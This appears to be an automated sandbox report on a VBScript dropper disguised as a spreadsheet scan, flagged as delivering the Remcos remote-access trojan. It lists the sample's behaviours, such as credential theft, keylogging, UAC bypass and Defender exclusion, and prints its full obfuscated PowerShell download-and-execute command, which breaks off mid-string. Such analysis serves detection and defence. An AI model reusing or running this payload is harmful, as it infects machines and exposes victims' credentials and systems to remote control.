Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SKMBT_77122012816310TD0128_17311_XLS.vbs

Overview

General Information

Sample name:SKMBT_77122012816310TD0128_17311_XLS.vbs
Analysis ID:1524804
MD5:9b36a3c24abb6bc8694e48e0c101c416
SHA1:6fd1c1c65d63f349734f2efcce64c88b3efd5e45
SHA256:7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + [char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + [char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + 